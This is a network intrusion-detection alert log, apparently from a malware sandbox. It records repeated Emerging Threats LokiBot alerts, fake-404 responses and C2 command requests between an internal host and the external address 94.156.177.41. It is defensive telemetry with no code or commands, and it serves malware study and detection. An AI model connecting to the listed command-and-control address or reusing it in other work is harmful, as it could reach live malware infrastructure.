2025-01-07T12:33:04.420628+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49869	94.156.177.41	80	TCP
2025-01-07T12:33:05.289917+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49875	94.156.177.41	80	TCP
2025-01-07T12:33:06.157706+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49882	94.156.177.41	80	TCP
2025-01-07T12:33:07.168337+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49888	94.156.177.41	80	TCP
2025-01-07T12:33:08.065316+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49898	94.156.177.41	80	TCP
2025-01-07T12:33:08.983613+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49904	94.156.177.41	80	TCP
2025-01-07T12:33:10.036766+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49910	94.156.177.41	80	TCP
2025-01-07T12:33:10.925247+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49918	94.156.177.41	80	TCP
2025-01-07T12:33:11.841098+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49927	94.156.177.41	80	TCP
2025-01-07T12:33:12.953872+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49933	94.156.177.41	80	TCP
2025-01-07T12:33:13.973579+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49941	94.156.177.41	80	TCP
2025-01-07T12:33:14.849018+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49950	94.156.177.41	80	TCP
2025-01-07T12:33:15.804831+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49956	94.156.177.41	80	TCP
2025-01-07T12:33:16.682925+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49962	94.156.177.41	80	TCP
2025-01-07T12:33:17.566164+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49968	94.156.177.41	80	TCP
2025-01-07T12:33:18.615544+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49974	94.156.177.41	80	TCP
2025-01-07T12:33:19.538604+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49985	94.156.177.41	80	TCP
2025-01-07T12:33:20.414906+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49991	94.156.177.41	80	TCP
2025-01-07T12:33:21.330905+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49997	94.156.177.41	80	TCP
2025-01-07T12:33:22.254058+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50003	94.156.177.41	80	TCP
2025-01-07T12:33:23.161672+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50010	94.156.177.41	80	TCP
2025-01-07T12:33:24.052352+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50019	94.156.177.41	80	TCP
2025-01-07T12:33:24.970591+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50026	94.156.177.41	80	TCP
2025-01-07T12:33:25.885204+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50032	94.156.177.41	80	TCP
2025-01-07T12:33:26.771343+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50038	94.156.177.41	80	TCP
2025-01-07T12:33:27.680964+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50045	94.156.177.41	80	TCP
2025-01-07T12:33:28.568840+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50054	94.156.177.41	80	TCP
2025-01-07T12:33:29.482591+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50060	94.156.177.41	80	TCP
2025-01-07T12:33:30.418199+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50067	94.156.177.41	80	TCP
2025-01-07T12:33:31.283218+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50073	94.156.177.41	80	TCP
2025-01-07T12:33:32.183439+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50079	94.156.177.41	80	TCP
2025-01-07T12:33:33.064766+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50086	94.156.177.41	80	TCP
2025-01-07T12:33:33.993234+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50094	94.156.177.41	80	TCP
2025-01-07T12:33:34.894254+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50100	94.156.177.41	80	TCP
2025-01-07T12:33:35.815203+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50106	94.156.177.41	80	TCP
2025-01-07T12:33:36.704614+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50112	94.156.177.41	80	TCP
2025-01-07T12:33:37.618568+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50114	94.156.177.41	80	TCP
2025-01-07T12:33:38.510581+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50115	94.156.177.41	80	TCP
2025-01-07T12:33:39.427169+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50116	94.156.177.41	80	TCP
2025-01-07T12:33:40.300156+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50117	94.156.177.41	80	TCP
2025-01-07T12:33:41.178680+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50118	94.156.177.41	80	TCP
2025-01-07T12:33:42.221421+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50119	94.156.177.41	80	TCP
2025-01-07T12:33:43.104720+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50120	94.156.177.41	80	TCP
2025-01-07T12:33:44.073014+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50121	94.156.177.41	80	TCP
2025-01-07T12:33:44.978438+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50122	94.156.177.41	80	TCP
2025-01-07T12:33:45.848723+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50123	94.156.177.41	80	TCP
2025-01-07T12:33:46.736292+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50124	94.156.177.41	80	TCP
2025-01-07T12:33:47.784973+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50125	94.156.177.41	80	TCP
2025-01-07T12:33:48.642095+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50126	94.156.177.41	80	TCP
2025-01-07T12:33:49.553437+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50127	94.156.177.41	80	TCP
2025-01-07T12:33:50.465759+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50128	94.156.177.41	80	TCP
2025-01-07T12:33:51.347194+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50129	94.156.177.41	80	TCP
2025-01-07T12:33:52.222675+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50130	94.156.177.41	80	TCP
2025-01-07T12:33:53.621252+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50131	94.156.177.41	80	TCP
2025-01-07T12:33:54.519173+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50132	94.156.177.41	80	TCP
2025-01-07T12:33:55.412870+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50133	94.156.177.41	80	TCP
2025-01-07T12:33:56.462921+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50134	94.156.177.41	80	TCP
2025-01-07T12:33:57.340598+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50135	94.156.177.41	80	TCP
2025-01-07T12:33:58.239632+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50136	94.156.177.41	80	TCP
2025-01-07T12:33:59.128389+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50137	94.156.177.41	80	TCP
2025-01-07T12:33:59.979403+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50138	94.156.177.41	80	TCP
2025-01-07T12:34:01.024157+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50139	94.156.177.41	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T12:31:59.242781+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50139	TCP
2025-01-07T12:32:03.316472+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49739	TCP
2025-01-07T12:32:04.346344+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49740	TCP
2025-01-07T12:32:05.262504+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49741	TCP
2025-01-07T12:32:07.009649+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49742	TCP
2025-01-07T12:32:07.939892+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49743	TCP
2025-01-07T12:32:08.824777+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49744	TCP
2025-01-07T12:32:09.737549+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49745	TCP
2025-01-07T12:32:10.807324+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49746	TCP
2025-01-07T12:32:11.922696+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49747	TCP
2025-01-07T12:32:12.858606+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49749	TCP
2025-01-07T12:32:13.761638+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49751	TCP
2025-01-07T12:32:14.651917+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49754	TCP
2025-01-07T12:32:15.599338+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49756	TCP
2025-01-07T12:32:16.538409+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49758	TCP
2025-01-07T12:32:17.450376+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49759	TCP
2025-01-07T12:32:18.370632+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49760	TCP
2025-01-07T12:32:19.260027+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49761	TCP
2025-01-07T12:32:20.166304+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49762	TCP
2025-01-07T12:32:21.060111+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49763	TCP
2025-01-07T12:32:21.999489+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49764	TCP
2025-01-07T12:32:22.924878+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49765	TCP
2025-01-07T12:32:23.824756+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49766	TCP
2025-01-07T12:32:24.703088+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49767	TCP
2025-01-07T12:32:25.629186+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49768	TCP
2025-01-07T12:32:26.582437+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49769	TCP
2025-01-07T12:32:27.435344+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49770	TCP
2025-01-07T12:32:28.347249+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49771	TCP
2025-01-07T12:32:29.354116+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49772	TCP
2025-01-07T12:32:30.226727+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49773	TCP
2025-01-07T12:32:31.100067+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49774	TCP
2025-01-07T12:32:31.994435+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49775	TCP
2025-01-07T12:32:32.896298+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49776	TCP
2025-01-07T12:32:33.776885+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49777	TCP
2025-01-07T12:32:34.670302+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49778	TCP
2025-01-07T12:32:35.562339+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49779	TCP
2025-01-07T12:32:36.439728+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49780	TCP
2025-01-07T12:32:37.329468+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49781	TCP
2025-01-07T12:32:38.197506+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49782	TCP
2025-01-07T12:32:39.109271+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49783	TCP
2025-01-07T12:32:39.962119+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49784	TCP
2025-01-07T12:32:40.845506+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49785	TCP
2025-01-07T12:32:41.710383+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49786	TCP
2025-01-07T12:32:42.595767+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49787	TCP
2025-01-07T12:32:43.485712+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49788	TCP
2025-01-07T12:32:44.373199+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49789	TCP
2025-01-07T12:32:45.265357+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49790	TCP
2025-01-07T12:32:46.125040+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49791	TCP
2025-01-07T12:32:47.031149+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49792	TCP
2025-01-07T12:32:47.919801+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49793	TCP
2025-01-07T12:32:48.826184+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49794	TCP
2025-01-07T12:32:49.717963+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49795	TCP
2025-01-07T12:32:50.614088+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49796	TCP
2025-01-07T12:32:51.499943+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49798	TCP
2025-01-07T12:32:52.427147+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49799	TCP
2025-01-07T12:32:53.328635+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49800	TCP
2025-01-07T12:32:54.431309+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49801	TCP
2025-01-07T12:32:55.301802+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49803	TCP
2025-01-07T12:32:56.189746+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49804	TCP
2025-01-07T12:32:57.078314+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49810	TCP
2025-01-07T12:32:57.967104+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49816	TCP
2025-01-07T12:32:58.858821+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49822	TCP
2025-01-07T12:32:59.725632+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49828	TCP
2025-01-07T12:33:00.612312+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49837	TCP
2025-01-07T12:33:01.502409+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49843	TCP
2025-01-07T12:33:02.400864+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49849	TCP
2025-01-07T12:33:03.290840+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49857	TCP
2025-01-07T12:33:04.233933+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49863	TCP
2025-01-07T12:33:05.139877+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49869	TCP
2025-01-07T12:33:06.016218+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49875	TCP
2025-01-07T12:33:06.899543+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49882	TCP
2025-01-07T12:33:07.927128+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49888	TCP
2025-01-07T12:33:08.813925+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49898	TCP
2025-01-07T12:33:09.729144+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49904	TCP
2025-01-07T12:33:10.776074+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49910	TCP
2025-01-07T12:33:11.664061+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49918	TCP
2025-01-07T12:33:12.599063+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49927	TCP
2025-01-07T12:33:13.822457+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49933	TCP
2025-01-07T12:33:14.703463+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49941	TCP
2025-01-07T12:33:15.589754+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49950	TCP
2025-01-07T12:33:16.534583+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49956	TCP
2025-01-07T12:33:17.420281+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49962	TCP
2025-01-07T12:33:18.323422+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49968	TCP
2025-01-07T12:33:19.388466+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49974	TCP
2025-01-07T12:33:20.267460+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49985	TCP
2025-01-07T12:33:21.183793+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49991	TCP
2025-01-07T12:33:22.102226+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49997	TCP
2025-01-07T12:33:22.993264+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50003	TCP
2025-01-07T12:33:23.910512+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50010	TCP
2025-01-07T12:33:24.790680+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50019	TCP
2025-01-07T12:33:25.731038+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50026	TCP
2025-01-07T12:33:26.615954+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50032	TCP
2025-01-07T12:33:27.509460+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50038	TCP
2025-01-07T12:33:28.411500+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50045	TCP
2025-01-07T12:33:29.326539+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50054	TCP
2025-01-07T12:33:30.205109+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50060	TCP
2025-01-07T12:33:31.138590+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50067	TCP
2025-01-07T12:33:32.026118+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50073	TCP
2025-01-07T12:33:32.925198+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50079	TCP
2025-01-07T12:33:33.842894+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50086	TCP
2025-01-07T12:33:34.755137+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50094	TCP
2025-01-07T12:33:35.668143+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50100	TCP
2025-01-07T12:33:36.547440+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50106	TCP
2025-01-07T12:33:37.467122+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50112	TCP
2025-01-07T12:33:38.356590+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50114	TCP
2025-01-07T12:33:39.284335+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50115	TCP
2025-01-07T12:33:40.154005+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50116	TCP
2025-01-07T12:33:41.031213+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50117	TCP
2025-01-07T12:33:42.073941+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50118	TCP
2025-01-07T12:33:42.948672+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50119	TCP
2025-01-07T12:33:43.915043+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50120	TCP
2025-01-07T12:33:44.826511+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50121	TCP
2025-01-07T12:33:45.698774+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50122	TCP
2025-01-07T12:33:46.590607+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50123	TCP
2025-01-07T12:33:47.646236+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50124	TCP
2025-01-07T12:33:48.501354+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50125	TCP
2025-01-07T12:33:49.405760+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50126	TCP
2025-01-07T12:33:50.313200+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50127	TCP
2025-01-07T12:33:51.196923+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50128	TCP
2025-01-07T12:33:52.082481+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50129	TCP
2025-01-07T12:33:53.261119+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50130	TCP
2025-01-07T12:33:54.365193+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50131	TCP
2025-01-07T12:33:55.268000+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50132	TCP
2025-01-07T12:33:56.172324+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50133	TCP
2025-01-07T12:33:57.179973+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50134	TCP
2025-01-07T12:33:58.093795+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50135	TCP
2025-01-07T12:33:58.984297+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50136	TCP
2025-01-07T12:33:59.837375+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50137	TCP
2025-01-07T12:34:00.727211+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50138	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-07T12:32:03.275190+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49739	94.156.177.41	80	TCP
2025-01-07T12:32:04.338995+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49740	94.156.177.41	80	TCP
2025-01-07T12:32:05.248744+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49741	94.156.177.41	80	TCP
2025-01-07T12:32:07.009365+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49742	94.156.177.41	80	TCP
2025-01-07T12:32:07.935086+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49743	94.156.177.41	80	TCP
2025-01-07T12:32:08.818254+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49744	94.156.177.41	80	TCP
2025-01-07T12:32:09.731700+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49745	94.156.177.41	80	TCP
2025-01-07T12:32:10.797050+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49746	94.156.177.41	80	TCP
2025-01-07T12:32:11.917927+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49747	94.156.177.41	80	TCP
2025-01-07T12:32:12.853819+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49749	94.156.177.41	80	TCP
2025-01-07T12:32:13.756413+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49751	94.156.177.41	80	TCP
2025-01-07T12:32:14.647155+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49754	94.156.177.41	80	TCP
2025-01-07T12:32:15.593522+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49756	94.156.177.41	80	TCP
2025-01-07T12:32:16.533683+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49758	94.156.177.41	80	TCP
2025-01-07T12:32:17.445085+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49759	94.156.177.41	80	TCP
2025-01-07T12:32:18.365851+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49760	94.156.177.41	80	TCP
2025-01-07T12:32:19.255213+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49761	94.156.177.41	80	TCP
2025-01-07T12:32:20.161554+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49762	94.156.177.41	80	TCP
2025-01-07T12:32:21.055285+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49763	94.156.177.41	80	TCP
2025-01-07T12:32:21.994686+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49764	94.156.177.41	80	TCP
2025-01-07T12:32:22.907710+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49765	94.156.177.41	80	TCP
2025-01-07T12:32:23.819944+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49766	94.156.177.41	80	TCP
2025-01-07T12:32:24.698249+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49767	94.156.177.41	80	TCP
2025-01-07T12:32:25.606968+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49768	94.156.177.41	80	TCP
2025-01-07T12:32:26.577641+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49769	94.156.177.41	80	TCP
2025-01-07T12:32:27.430547+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49770	94.156.177.41	80	TCP
2025-01-07T12:32:28.316402+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49771	94.156.177.41	80	TCP
2025-01-07T12:32:29.349357+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49772	94.156.177.41	80	TCP
2025-01-07T12:32:30.221935+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49773	94.156.177.41	80	TCP
2025-01-07T12:32:31.091089+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49774	94.156.177.41	80	TCP
2025-01-07T12:32:31.988683+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49775	94.156.177.41	80	TCP
2025-01-07T12:32:32.891493+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49776	94.156.177.41	80	TCP
2025-01-07T12:32:33.772124+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49777	94.156.177.41	80	TCP
2025-01-07T12:32:34.665544+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49778	94.156.177.41	80	TCP
2025-01-07T12:32:35.557501+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49779	94.156.177.41	80	TCP
2025-01-07T12:32:36.434903+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49780	94.156.177.41	80	TCP
2025-01-07T12:32:37.324672+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49781	94.156.177.41	80	TCP
2025-01-07T12:32:38.192729+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49782	94.156.177.41	80	TCP
2025-01-07T12:32:39.104383+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49783	94.156.177.41	80	TCP
2025-01-07T12:32:39.957327+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49784	94.156.177.41	80	TCP
2025-01-07T12:32:40.840674+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49785	94.156.177.41	80	TCP
2025-01-07T12:32:41.705575+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49786	94.156.177.41	80	TCP
2025-01-07T12:32:42.591000+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49787	94.156.177.41	80	TCP
2025-01-07T12:32:43.480919+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49788	94.156.177.41	80	TCP
2025-01-07T12:32:44.368376+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49789	94.156.177.41	80	TCP
